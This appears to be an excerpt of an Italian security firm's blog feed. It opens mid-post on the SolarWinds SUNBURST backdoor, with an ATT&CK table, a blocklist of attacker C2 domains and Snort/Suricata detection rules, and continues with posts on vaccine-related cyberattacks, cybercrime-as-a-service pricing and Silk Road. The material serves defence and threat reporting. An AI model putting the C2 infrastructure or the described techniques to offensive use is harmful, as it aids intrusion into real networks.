&lt;p&gt;Ottenute le credenziali di accesso alla repository di update ed il certificato di digital signature, la creazione di un Microsoft Patch File (.msp), &amp;ldquo;armato&amp;rdquo; per scopi malevoli è un&amp;rsquo;operazione banale, è invece &lt;strong&gt;&lt;em&gt;&amp;ldquo;some of the best operational security&amp;rdquo;&lt;/em&gt;&lt;/strong&gt; il &lt;strong&gt;passare inosservati per 8 mesi&lt;/strong&gt; all&amp;rsquo;interno di alcune delle più sicure organizzazioni al mondo.&lt;/p&gt;

&lt;p&gt;Per ottenere questo livello di furtività l&amp;rsquo;APT che ha ideato UNC2452 si è avvalso del &lt;strong&gt;OIP - Orion Improvemement Program&lt;/strong&gt;, un protocollo legittimo di SolarWinds che utilizza HTTPS per contattare la casa madre ai fini diagnostici.
Grazie ad una semplice modifica sui DNS SolarWinds è stato possibile sfruttare un CNAME legittimo per contattare un IP gestito dal threat actor, utilizzando OIP come protocollo C2C.&lt;/p&gt;

&lt;p&gt;La backdoor, chiamata &lt;strong&gt;SUNBURST&lt;/strong&gt;, inserita nel file &lt;code&gt;SolarWinds.Orion.Core.BusinessLayer.dll&lt;/code&gt; è stata riscontrata ad oggi su 18000 dei 300000 clienti SolarWinds Orion.&lt;/p&gt;

&lt;p&gt;L&amp;rsquo;infection chain di questa campagna è stata variata nel tempo ma è ad alto livello riconducibile a:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Esecuzione della Orion modificata dal APT e posta sul update server Solarwinds&lt;/li&gt;
&lt;li&gt;Periodo latente, tra 1 e 7 settimane&lt;/li&gt;
&lt;li&gt;Beaconing OIP per identificazione target&lt;/li&gt;
&lt;li&gt;Verifica target da parte dell&amp;rsquo;APT, decisione di continuazione o dearm dell&amp;rsquo;attacco&lt;/li&gt;
&lt;li&gt;Download dell&amp;rsquo;agente di persistenza&lt;/li&gt;
&lt;li&gt;Istaurazione della connessione offuscata con C2C&lt;/li&gt;
&lt;li&gt;Lateral Movement con credenziali differenziate&lt;/li&gt;
&lt;li&gt;Swap ed estrazione di file&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Di seguito la matrice MITRE ATT&amp;amp;ACK con le tecniche osservate nei samples:&lt;/p&gt;

&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;ID&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;

&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;T1012&lt;/td&gt;
&lt;td&gt;Query Registry&lt;/td&gt;
&lt;/tr&gt;

&lt;tr&gt;
&lt;td&gt;T1027&lt;/td&gt;
&lt;td&gt;Obfuscated Files or Information&lt;/td&gt;
&lt;/tr&gt;

&lt;tr&gt;
&lt;td&gt;T1057&lt;/td&gt;
&lt;td&gt;Process Discovery&lt;/td&gt;
&lt;/tr&gt;

&lt;tr&gt;
&lt;td&gt;T1070.004&lt;/td&gt;
&lt;td&gt;File Deletion&lt;/td&gt;
&lt;/tr&gt;

&lt;tr&gt;
&lt;td&gt;T1071.001&lt;/td&gt;
&lt;td&gt;Web Protocols&lt;/td&gt;
&lt;/tr&gt;

&lt;tr&gt;
&lt;td&gt;T1071.004&lt;/td&gt;
&lt;td&gt;Application Layer Protocol: DNS&lt;/td&gt;
&lt;/tr&gt;

&lt;tr&gt;
&lt;td&gt;T1083&lt;/td&gt;
&lt;td&gt;File and Directory Discovery&lt;/td&gt;
&lt;/tr&gt;

&lt;tr&gt;
&lt;td&gt;T1105&lt;/td&gt;
&lt;td&gt;Ingress Tool Transfer&lt;/td&gt;
&lt;/tr&gt;

&lt;tr&gt;
&lt;td&gt;T1132.001&lt;/td&gt;
&lt;td&gt;Standard Encoding&lt;/td&gt;
&lt;/tr&gt;

&lt;tr&gt;
&lt;td&gt;T1195.002&lt;/td&gt;
&lt;td&gt;Compromise Software Supply Chain&lt;/td&gt;
&lt;/tr&gt;

&lt;tr&gt;
&lt;td&gt;T1518&lt;/td&gt;
&lt;td&gt;Software Discovery&lt;/td&gt;
&lt;/tr&gt;

&lt;tr&gt;
&lt;td&gt;T1518.001&lt;/td&gt;
&lt;td&gt;Security Software Discovery&lt;/td&gt;
&lt;/tr&gt;

&lt;tr&gt;
&lt;td&gt;T1543.003&lt;/td&gt;
&lt;td&gt;Windows Service&lt;/td&gt;
&lt;/tr&gt;

&lt;tr&gt;
&lt;td&gt;T1553.002&lt;/td&gt;
&lt;td&gt;Code Signing&lt;/td&gt;
&lt;/tr&gt;

&lt;tr&gt;
&lt;td&gt;T1568.002&lt;/td&gt;
&lt;td&gt;Domain Generation Algorithms&lt;/td&gt;
&lt;/tr&gt;

&lt;tr&gt;
&lt;td&gt;T1569.002&lt;/td&gt;
&lt;td&gt;Service Execution&lt;/td&gt;
&lt;/tr&gt;

&lt;tr&gt;
&lt;td&gt;T1584&lt;/td&gt;
&lt;td&gt;Compromise Infrastructure&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;

&lt;p&gt;Questa campagna è da denotare come high effort in quanto l&amp;rsquo;APT ha creato i seguenti componenti dal nuovo:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;TEARDROP&lt;/strong&gt;: un dropper stenografico memory-only, sfrutta il download di uno stream immagine per ottenere l&amp;rsquo;agente di persistenza&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Custom BEACON&lt;/strong&gt;: versione fortemente customizzata di Cobalt Strike BEACON utilizzato come agente di persistenza sulle macchine target simula il protocollo OIP per lo scambio di messaggi con i C2 server. Questa webshell è stata chiamata dagli analisti SUPERNOVA&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;SolarWinds ha rilasciato una &lt;a href=&#34;https://www.solarwinds.com/securityadvisory&#34;&gt;advisory&lt;/a&gt; riportante i passi necessari per il &lt;strong&gt;contenimento e neutralizzazione dell&amp;rsquo;attacco&lt;/strong&gt;. Vista la complessità di UNC2452 e il tempo in cui è passata inosservata sono ancora da valutare possibili impatti sulle infrastrutture, durante l&amp;rsquo;analisi di alcuni messaggi C2C abbiamo riconosciuto comandi per la modifica di ACL su apparati di network-security perimetrali dei maggiori vendor.&lt;/p&gt;

&lt;p&gt;CybergON ha implementato all&amp;rsquo;interno delle sue &lt;a href=&#34;https://github.com/Cyberg-ON/Timon-Rules&#34;&gt;firme SNORT/Suricata opensource&lt;/a&gt; la &lt;strong&gt;detection del protocollo OIP&lt;/strong&gt; sfruttato dal Threat Actor e relativa blocklist sui CNAME utilizzati dal dropper per l&amp;rsquo;identificazione del cliente:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;.appsync-api.eu-west-1.avsvmcloud.com&lt;/li&gt;
&lt;li&gt;.appsync-api.us-west-2.avsvmcloud.com&lt;/li&gt;
&lt;li&gt;.appsync-api.us-east-1.avsvmcloud.com&lt;/li&gt;
&lt;li&gt;.appsync-api.us-east-2.avsvmcloud.com&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/sunburst/Cybergon_Opensource_Signatures.png&#34; alt=&#34;Cybergon_Opensource_Signatures&#34; /&gt;&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4&#34;&gt;&lt;code class=&#34;language-rules&#34; data-lang=&#34;rules&#34;&gt;alert tcp $HOME_NET any -&amp;gt; any any (msg:&amp;#34;Backdoor.SUNBURST&amp;#34;; content:&amp;#34;T &amp;#34;; offset:2; depth:3; content:&amp;#34;/swip/Events HTTP/1&amp;#34;; within:100; content:&amp;#34;Host: &amp;#34;; content:!&amp;#34;.solarwinds.com&amp;#34;; within:100; sid:870182902; rev:1;)
alert tcp $HOME_NET any -&amp;gt; any any (msg:&amp;#34;Backdoor.SUNBURST&amp;#34;; content:&amp;#34;T &amp;#34;; offset:2; depth:3; content:&amp;#34;/swip/upd/SolarWinds.CortexPlugin.Components.xml&amp;#34;; distance:0; content:&amp;#34;Host: &amp;#34;; content:!&amp;#34;.solarwinds.com&amp;#34;; within:100; sid:870182903; rev:1;)
alert tcp any any -&amp;gt; any any (msg:&amp;#34;Backdoor.SUNBURST&amp;#34;; content:&amp;#34;T &amp;#34;; offset:2; depth:3; content:&amp;#34;Host:&amp;#34;; content:&amp;#34;.avsvmcloud.com&amp;#34;; distance:0; sid:870182900; rev:1;)
alert tcp $HOME_NET any -&amp;gt; any any (msg:&amp;#34;Backdoor.SUNBURST&amp;#34;; content:&amp;#34;T &amp;#34;; offset:2; depth:3; content:&amp;#34;swip/Upload.ashx HTTP/1&amp;#34;; within:100; content:&amp;#34;Host: &amp;#34;; content:!&amp;#34;.solarwinds.com&amp;#34;; within:100; sid:870182901; rev:1;)
alert tcp $HOME_NET any -&amp;gt; any any (msg:&amp;#34;Backdoor.SUNBURST&amp;#34;; content:&amp;#34;T &amp;#34;; offset:2; depth:3; content:&amp;#34;/swip/upd/&amp;#34;; within:75; content:&amp;#34; HTTP/1.&amp;#34;; distance:0; content:&amp;#34;Host: &amp;#34;; content:!&amp;#34;.solarwinds.com&amp;#34;; within:100; sid:870182910; rev:1;)&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Per evitare che un semplice cambio di infrastruttura potesse ridare nuova vita a questo attacco &lt;strong&gt;sono state create alcune regole yara&lt;/strong&gt; che permettono la detection dei due stati del malware SUNBURST e SUPERNOVA, queste rules applicate alla nostra sandbox sono state in grado di riconoscere con &lt;strong&gt;87% di accuratezza&lt;/strong&gt; sample estratti da attacchi al momento in corso.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/sunburst/Sandbox01.png&#34; alt=&#34;Sandbox01&#34; /&gt;
&lt;img src=&#34;https://blog.cybergon.com/imgs/sunburst/Sandbox02.png&#34; alt=&#34;Sandbox02&#34; /&gt;&lt;/p&gt;

&lt;p&gt;La first discovery di UNC2452 è avvenuta a seguito dell&amp;rsquo;indagine sul databreach subito dalla compagnia di sicurezza FireEye, anch&amp;rsquo;essa vittima dell&amp;rsquo;attacco.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Covid-19 e vaccino: gli attacchi informatici</title>
         <link>https://blog.cybergon.com/posts/covid-19-vaccino-gli-attacchi-informatici/</link>
         <pubDate>Fri, 11 Dec 2020 14:36:01 +0000</pubDate>
         <authors>
         
              
             <author>Jeremy Moeys</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/covid-19-vaccino-gli-attacchi-informatici/</guid>
         <description>

&lt;p&gt;La cyberwarfare, la sponsorizzazione di Stato del crimine informatico, dall’inizio pandemia Covid-19 si è tramutata in una vera e propria &lt;strong&gt;guerra alla proprietà intellettuale&lt;/strong&gt;.
Secondo il &lt;a href=&#34;https://www.enisa.europa.eu/topics/threat-risk-management/threats-and-trends&#34;&gt;report Enisa 2020&lt;/a&gt; lo spionaggio è la motivazione dietro al 20% dei data breach e ha visto un significativo incremento tra luglio e novembre, periodo in cui la speculazione sui vaccini anti-covid si è fatta più intensa.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/vaccino-attacchi/vaccino-attacchi-1.jpg&#34; alt=&#34;vaccino-attacchi-1&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Abbiamo ripercorso il sentiero intrapreso dai gruppi criminali che hanno pianificato attacchi a case farmaceutiche e laboratori di ricerca da quando l’ipotesi di un vaccino si è fatta strada tra le testate giornalistiche.
Abbiamo individuato &lt;strong&gt;tre paesi coinvolti&lt;/strong&gt; nei tentativi di esfiltrazioni di dati fino ad oggi: Russia, Cina e Nord Corea.
Gli interessi dei criminali informatici sono puramente economici, lucrano grazie ai riscatti dopo la sottrazione di informazioni sensibili e alla loro vendita nel &lt;em&gt;dark web&lt;/em&gt;. Tuttavia, è stimato che il 38% dei criminali informatici è finanziato dalla Nazione di provenienza e dai suoi reparti di Intelligence.&lt;/p&gt;

&lt;h2 id=&#34;la-timeline-degli-attacchi&#34;&gt;La timeline degli attacchi&lt;/h2&gt;

&lt;p&gt;Gli intenti della Russia e della Cina dietro agli attacchi sono chiari: poter &lt;strong&gt;visionare i risultati delle sperimentazioni&lt;/strong&gt; che risultano simili ai loro vaccini e possedere diverse varianti da quelle create nei loro laboratori. Infine, la Corea del Nord, non avendo le competenze scientifiche per creare un vaccino autoctono ha come principale obiettivo l’appropriamento del brevetto per poterlo sviluppare in modo autonomo.
Emerge così l’attenta pianificazione criminosa che mette a dura prova Agenzie di intelligence come l’&lt;strong&gt;NSA americana&lt;/strong&gt; e il &lt;strong&gt;NCSC britannico&lt;/strong&gt;, impegnate nel proteggere risorse più delicate e che le rilegano sempre più a ruoli di pedine di un gioco ormai già predestinato.&lt;/p&gt;

&lt;p&gt;A &lt;strong&gt;maggio&lt;/strong&gt; quando il vaccino era solo in una prima fase clinica, il &lt;em&gt;dark web&lt;/em&gt;, cartina tornasole per le pratiche illecite e criminose, era già popolato da vaccini fasulli venduti dagli USA per 400$ e da litri di plasma di pazienti Covid-19 per 1700$.&lt;/p&gt;

&lt;p&gt;Il &lt;strong&gt;16 luglio del 2020&lt;/strong&gt; viene registrato il vero primo attacco a diversi laboratori americani, inglesi e canadesi da parte del famoso gruppo &lt;em&gt;Cozy Bear&lt;/em&gt;, conosciuto anche come ATP29 &lt;a href=&#34;https://cybergon.com/blog/posts/advance-persistent-threat-i-nuovi-cyber-criminali/&#34;&gt;(Advance Persistant Threat)&lt;/a&gt; e legata ai servizi di sicurezza russi. Il modus operandi del gruppo criminale è differente da quello visto in passato, che consisteva in attacchi di &lt;em&gt;spear-phishing&lt;/em&gt; con link malevoli e furto di credenziali riutilizzate per successivi movimenti laterali.
In questa nuova campagna di attacco sfruttano &lt;strong&gt;vulnerabilità dei sistemi&lt;/strong&gt; come &lt;em&gt;CVE-2019-19781 Citrix&lt;/em&gt; e &lt;em&gt;CVE-2019-11510 Pulse Secure VPN&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;Il &lt;strong&gt;21 luglio 2020&lt;/strong&gt; viene registrato un altro attacco, questa volta da parte della Cina: &lt;em&gt;Jiazhi Dong&lt;/em&gt; e  &lt;em&gt;Xiaoyu Li&lt;/em&gt; entrano nei server di alcune aziende coinvolte nella lavorazione sul vaccino. Questi due criminali assoldati dall’Intelligence Cinese, hanno un CV - o meglio una fedina penale - davvero impressionante: attivi già nel lontano 2009 hanno esfiltrato brevetti industriali in paesi come Spagna, Olanda, UK, Svezia, Germania, Giappone per centinaia di milioni di dollari.
Sono stati i primi a colpire durante l’emergenza. Tre vittime: due società americane che studiano la cura per il virus, attaccate il 27 gennaio e il 1 febbraio; più una terza colpita una settimana dopo aver annunciato il proprio coinvolgimento nella ricerca sul vaccino.&lt;/p&gt;

&lt;p&gt;Microsoft il &lt;strong&gt;13 novembre 2020&lt;/strong&gt; denuncia Nord Corea e Russia per attacchi a laboratori produttori di vaccini in sperimentazione clinica in USA, Canada, Francia, Corea del Sud e India. Questa volta Russia e Corea si spartiscono l’attribuzione degli attacchi. Un’ondata massiva di &lt;em&gt;brute forcing&lt;/em&gt;, una tecnica illecita per forzare le password, arriva dai criminali russi denominati &lt;em&gt;Strontium&lt;/em&gt;.
Altri due gruppi criminali nord coreani, &lt;em&gt;Zinco&lt;/em&gt; e &lt;em&gt;Cerium&lt;/em&gt;, portano avanti la loro offensiva: mentre il primo invia mail di &lt;em&gt;spear-phishing&lt;/em&gt; per rubare credenziali agli utenti, il secondo impersonifica per il medesimo scopo l’Organizzazione Mondiale della Sanità.&lt;/p&gt;

&lt;p&gt;Il &lt;strong&gt;27 Novembre&lt;/strong&gt; avviene l’attacco ad Astrazeneca, azienda farmaceutica che sta sviluppando il primo vaccino al mondo senza RNA. Criminali nord coreani bersagliano i dipendenti sfruttando tecniche di ingegneria sociale. In particolare i criminali offrono, tramite LinkedIn o WhatsApp, posti di lavoro specializzati per cui l’interessato fornisce informazioni sensibili che sarebbero state riutilizzate successivamente per fare breccia nel perimetro aziendale.&lt;/p&gt;

&lt;p&gt;Il &lt;strong&gt;3 Dicembre 2020&lt;/strong&gt; IBM notifica la possibilità di attacchi da Cina, Russia e Corea del Nord che punterebbero non più ai centri di ricerca ma alla catena del freddo necessaria per il trasporto dei vaccini. Sarebbe proprio la conservazione a circa -70° centigradi dello Pfizer il possibile anello debole nella catena del sistema logistico per il vaccino, per cui in caso di attacco &lt;em&gt;ransomware&lt;/em&gt;, i criminali potrebbero richiedere riscatti onerosi per evitare lo spegnimento dei sistemi di raffreddamento.&lt;/p&gt;

&lt;p&gt;Il &lt;strong&gt;10 Dicembre&lt;/strong&gt;, infine, vengono attaccati alcuni server dell’EMA, l&amp;rsquo;Agenzia europea del farmaco con sede ad Amsterdam, dove sono conservati alcuni documenti che riguardano la &amp;ldquo;presentazione normativa&amp;rdquo; del vaccino &lt;em&gt;BNT162b2&lt;/em&gt; delle due case farmaceutiche Pfizer-BioNtech, rispettivamente USA e Germania. Il nullaosta dell’European Medicines Agency per il vaccino è atteso per il 29 dicembre e ha già notificato che questo cyber attacco non interferirà con la revisione. L’ente è inoltre in processo di validazione anche per il vaccino di Moderna, di Astrazeneca (Oxford-Pomezia) e di Johnson&amp;amp;Johnson.&lt;/p&gt;

&lt;p&gt;Sars-Cov-2 non ha solo &lt;strong&gt;digitalizzato interi paesi&lt;/strong&gt; ma ha anche scombinato le carte in tavola di potenze mondiali che si contrastano in una guerra “cibernetica” fatta di vulnerabilità e dati sensibili.
Il famoso patto di non aggressione cyber firmato nel 2015 tra l’allora presidente americano Barack Obama e quello cinese Xi sembra solo un lontano ricordo.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Il business dietro al business: Cybercrime as a Service</title>
         <link>https://blog.cybergon.com/posts/il-business-dietro-al-business-cybercrime-as-a-service/</link>
         <pubDate>Thu, 12 Nov 2020 12:30:01 +0000</pubDate>
         <authors>
         
              
             <author>Sara Loprete</author>
         
               
             <author>Marco Nilo</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/il-business-dietro-al-business-cybercrime-as-a-service/</guid>
         <description>

&lt;p&gt;Nefilim, Egregor, WastedLocker, Maze. Sono questi i nomi dei Ransomware che stanno colpendo le aziende del mercato italiano.
Luxottica è stato uno degli ultimi nomi a riempire le pagine di giornale, nome che sta suscitando scalpore perché sembra che i dati della compagnia siano stati rubati e pubblicati nel Dark Web, contrariamente a quanto dichiarato inizialmente dall’azienda.&lt;/p&gt;

&lt;p&gt;E’ piuttosto ovvio che l’attacco all’azienda presuppone un &lt;strong&gt;investimento in termini di tempo e preparazione&lt;/strong&gt; maggiore di quello al privato. Lo sforzo che fanno questi gruppi è però direttamente proporzionale al guadagno: i riscatti che molte aziende pagano sono cifre da capogiro.
Come funziona esattamente il business dei gruppi criminali l’avevamo raccontato con il supporto di un &lt;a href=&#34;https://cybergon.com/blog/posts/businessmodelcanvas/&#34;&gt;Business Model Canvas in versione Dark&lt;/a&gt;, modello che ci fa comprendere come il cyber crime si organizzi proprio come un’industria.
E a proposito di business, come questi gruppi nascono, così si evolvono: è il caso di Maze, che qualche giorno fa ha dichiarato la chiusura del progetto, probabilmente per aderire a qualcosa di più grande.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/cybercrime-as-a-service/cybercrime-as-a-service.jpeg&#34; alt=&#34;cybercrime-as-a-service&#34; /&gt;&lt;/p&gt;

&lt;h2 id=&#34;tra-le-fonti-di-guadagno-i-riscatti&#34;&gt;Tra le fonti di guadagno: i riscatti&lt;/h2&gt;

&lt;p&gt;Osservando il modello di business, si nota che una delle fonti di introito dei gruppi criminali, specialmente quelli organizzati e strutturati che prendono di mira le grandi aziende o gli enti governativi – i cosiddetti &lt;a href=&#34;https://cybergon.com/blog/posts/advance-persistent-threat-i-nuovi-cyber-criminali/&#34;&gt;gruppi ATP&lt;/a&gt; -  sia proprio il &lt;strong&gt;pagamento dei riscatti&lt;/strong&gt; a seguito del blocco dei sistemi e delle esflitrazioni di dati. Lo stesso pagamento che ha effettuato Garmin solo qualche mese fa di 10 milioni di dollari dopo aver preso WastedLocker.&lt;/p&gt;

&lt;p&gt;E’ bene fare una considerazione: l’attacco ransomware rappresenta l’&lt;strong&gt;1% del market share degli attacchi&lt;/strong&gt; a livello mondiale e nonostante ciò un attacco di questo tipo ha successo ogni 11 secondi nel mondo. Tuttavia è difficile, se non impossibile, fare una stima dei guadagni derivanti dai pagamenti dei riscatti. Esiste una cifra media, relativa al 2019, di circa 85.000$ a riscatto; non sappiamo però quante aziende effettivamente dichiarino di aver pagato il riscatto e quali somme.
Il 2020, che ha visto un incremento generale degli attacchi, potrebbe aver cambiato le carte in tavola, e la &lt;em&gt;cryptovaluta&lt;/em&gt; utilizzata per questo genere di operazioni, inoltre, spesso è difficilmente tracciabile, seppur non impossibile.&lt;/p&gt;

&lt;p&gt;Sappiamo in ogni caso che l’industria del cyber crime muove cifre astronomiche, si stima che superi i &lt;strong&gt;1500 miliardi di dollari&lt;/strong&gt; e solo una parte di questi deriva dagli attacchi ransomware.
La domanda che ci si pone a questo punto riguarda le altre fonti di guadagno.&lt;/p&gt;

&lt;h2 id=&#34;cybercrime-as-a-service-il-modello-che-apre-le-porte-del-crimine-al-grande-pubblico&#34;&gt;Cybercrime as a Service: il modello che apre le porte del crimine al grande pubblico&lt;/h2&gt;

&lt;p&gt;Se sai fare bene qualcosa, mai farla gratis, diceva il &lt;em&gt;Joker&lt;/em&gt; di Cristopher Nolan.
Ed è forse seguendo questo mantra che il mercato del cyber crime ha aperto le porte anche ai profani dell’informatica.
Da qualche anno a questa parte si è costituito e si va consolidando un modello che si può definire del &lt;strong&gt;Cybercrime as a Service&lt;/strong&gt;, ovvero la &lt;strong&gt;commercializzazione di strumenti e prodotti&lt;/strong&gt; atti a commettere crimini informatici: dai malware, ai database di informazioni rubate, alle botnet. Una distribuzione non tanto diversa da quella di qualsiasi altra tipologia di business.
Questo modello prende una declinazione diversa a seconda del soggetto della compravendita e degli attori coinvolti.&lt;/p&gt;

&lt;h3 id=&#34;database-e-nuove-identità&#34;&gt;Database e nuove identità&lt;/h3&gt;

&lt;p&gt;Nel Dark Web se si sa dove cercare, si può trovare qualunque cosa. Seguendo questo principio, possiamo rispondere alla domanda: dove finiscono i nostri dati quando vengono rubati?&lt;/p&gt;

&lt;p&gt;Tra il furto di dati e credenziali e l’utilizzo degli stessi per scopi illeciti, però, avvengono molto spesso dei “passaggi di proprietà”: queste informazioni vengono &lt;strong&gt;vendute&lt;/strong&gt; al grande pubblico, per un totale stimato di &lt;strong&gt;$500 miliardi&lt;/strong&gt;.
Non è possibile conoscere con esattezza quanti siti e contenuti ci siano nel Dark Web, ma si stima ve ne siano per 18 milioni di GB e 550 miliardi di documenti, vale a dire che l’offerta soddisfa pienamente la domanda.&lt;/p&gt;

&lt;p&gt;Il &lt;strong&gt;listino prezzi&lt;/strong&gt; è vario: un passaporto in Europa costa circa 700 dollari, una patente $300, un account PayPal parte da $125 e varia in base alla disponibilità del conto, per i meno pretenziosi una carta di credito “solo” $45.&lt;/p&gt;

&lt;p&gt;Una ricerca di &lt;a href=&#34;https://www.safetydetectives.com/blog/dark-web-the-average-cost-of-buying-a-new-identity/&#34;&gt;SafetyDetectives&lt;/a&gt; ha evidenziato come &lt;strong&gt;&amp;ldquo;rifarsi una vita&amp;rdquo;&lt;/strong&gt; in Europa abbia un costo minimo di 1240 dollari, il quale include una nuova identità completa, titoli di studio e un profilo finanziario di tutto rispetto, ed è tutto facilmente acquistabile sul Dark Web.&lt;/p&gt;

&lt;p&gt;Se invece l’obiettivo dell’acquirente è meno ambizioso, si possono trovare &lt;strong&gt;account di posta elettronica e di social network&lt;/strong&gt;: Gmail vale circa $155, un profilo Facebook $75, Instragram $55 e Twitter $49.
Inutile dire che questi account sono rubati, ad esempio tramite campagne di Phishing, ed è pertanto illegale acquistarli.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/cybercrime-as-a-service/identity-passport.PNG&#34; alt=&#34;identity-passport&#34; /&gt;&lt;/p&gt;

&lt;h3 id=&#34;malware-as-a-service&#34;&gt;Malware as a Service&lt;/h3&gt;

&lt;p&gt;Non serve essere un professionista del coding per organizzare un attacco informatico. Oggi chiunque può “acquistare”, personalizzare e diffondere malware. Nella sua variante più famosa, quella del ransomware, questa pratica prende il nome di Ransomware as a service o RaaS.&lt;/p&gt;

&lt;p&gt;L’acquirente può acquistare ciò che desidera proprio come fosse su Amazon. Una delle più popolari &lt;strong&gt;piattaforme di Ransomware as a Service&lt;/strong&gt; è oggi &lt;em&gt;RaaSberry&lt;/em&gt;, molto semplice da utilizzare: offre una selezione di pacchetti ransomware a partire da 60 e fino a 650 dollari.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/cybercrime-as-a-service/raas-platform.jpg&#34; alt=&#34;raas-platform&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Le quote di profitto derivato dall’attacco andato a buon fine sono solitamente del 70-60% per chi compra e del 30-40% per chi vende, che oltre al &amp;ldquo;prodotto&amp;rdquo; offre il proprio tempo e la propria competenza.&lt;/p&gt;

&lt;p&gt;Quando parliamo di MaaS o RaaS, malware e ransomware vengono &lt;strong&gt;programmati ad hoc&lt;/strong&gt; per questo scopo: GandCrab e Cerber sono due esempi di ransomware che sono stati sviluppati in base a questo modello attraverso vari servizi online come &lt;em&gt;Satana&lt;/em&gt; oppure &lt;em&gt;Hall of Ransomware&lt;/em&gt;: il sito raggiunto grazie al portale &lt;em&gt;Tor&lt;/em&gt;, consente a chiunque di creare e configurare qualsiasi tipologia di ransomware e scegliere tra una vasta gamma di tecniche di infezione, selezionare la richiesta di riscatto, il contatto e tracciare la somma ricevuta. GrandCrab in particolare, ha fruttato oltre &lt;strong&gt;2 miliardi di dollari in riscatti&lt;/strong&gt; nel 2019.&lt;/p&gt;

&lt;p&gt;Un vero e proprio “kit ransomware” per facilitare l&amp;rsquo;esecuzione di attacchi per i criminali principianti e poter iniziare a estorcere denaro grazie alla possibilità di bloccare e sequestrare dati di una macchina con un solo click.&lt;/p&gt;

&lt;h3 id=&#34;botnet-a-noleggio&#34;&gt;Botnet a noleggio&lt;/h3&gt;

&lt;p&gt;Un altro prodotto che puoi acquistare dallo scaffale immenso del mercato nero, è l’&lt;strong&gt;attacco DDoS&lt;/strong&gt;.
Un attacco DDoS (Distributed Denial of Service) per andare a buon fine necessita di &lt;strong&gt;reti botnet&lt;/strong&gt;, ovvero migliaia di dispositivi compromessi, in grado di generare traffico dati verso uno specifico target con l’obiettivo di saturarne in poco tempo le risorse e di renderlo indisponibile.&lt;/p&gt;

&lt;p&gt;Alcuni criminali hanno a disposizione queste reti &lt;em&gt;botnet&lt;/em&gt; che sono in grado di indirizzare una certa quantità di traffico. Sulla base di questa caratteristica, della qualità della botnet (una botnet di dispositivi IoT vale meno di una di server, ad esempio) e del tempo richiesto per l’attacco vengono impostati i prezzi: un attacco di tre ore può costare $60, per 5 minuti solo $5.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/cybercrime-as-a-service/botnet-noleggio.png&#34; alt=&#34;botnet-noleggio&#34; /&gt;&lt;/p&gt;

&lt;p&gt;In alternativa puoi acquistare un &lt;strong&gt;accesso via RDP&lt;/strong&gt; e usarlo per diffondere malware o per altre attività illecite: i costi partono da $8 e puoi selezionare il paese e la città di tuo interesse e il sistema operativo, avere una lista di possibilità e vedere i dettagli di ogni server disponibile.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/cybercrime-as-a-service/accesso-rdp.jpg&#34; alt=&#34;accesso-rdp&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Questa cooperazione tra criminali – che siano esperti del prodotto o acquirenti ignari – è uno sviluppo preoccupante.
La condivisione di consigli, tattiche e di piattaforme centralizzate consente loro di eseguire attacchi più avanzati e con riscatti potenzialmente più onerosi. Un’industria moderna in continua evoluzione che non sembra avere intenzione di fermarsi.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Un miliardo di dollari e l&#39;ombra di Silk Road</title>
         <link>https://blog.cybergon.com/posts/un-miliardo-di-dollari-e-lombra-di-silk-road/</link>
         <pubDate>Sun, 08 Nov 2020 10:36:01 +0000</pubDate>
         <authors>
         
              
             <author>Marco Lucchina</author>
         
               
             <author>Simone Errico</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/un-miliardo-di-dollari-e-lombra-di-silk-road/</guid>
         <description>&lt;p&gt;Silk Road è stato &lt;strong&gt;un sito di e-commerce del Dark Web&lt;/strong&gt;, forse il più famoso, sicuramente uno dei pochi giunti alla ribalta della cronaca.
Per essere più precisi la cronaca l’ha occupata il suo fondatore, Ross Ulbricht, condannato nel 2017 all’ergastolo senza possibilità di concessione di libertà condizionale.&lt;/p&gt;

&lt;p&gt;Ulbricht o &lt;em&gt;Dread Pirate Roberts&lt;/em&gt;, classe 1984, creò il sito Silk Road nel 2009, agli albori di questo mondo, nell’anno zero dei Bitcoin; nei quattro anni successivi, fino al suo arresto, il sito vendette ogni genere di &lt;strong&gt;droga, pornografia, prodotti contraffatti, documenti falsificati e armi&lt;/strong&gt;.
Si stimava che gli incassi fossero di oltre &lt;strong&gt;due milioni di dollari al giorno&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/silk-road/silk-road.jpg&#34; alt=&#34;silk-road&#34; /&gt;&lt;/p&gt;

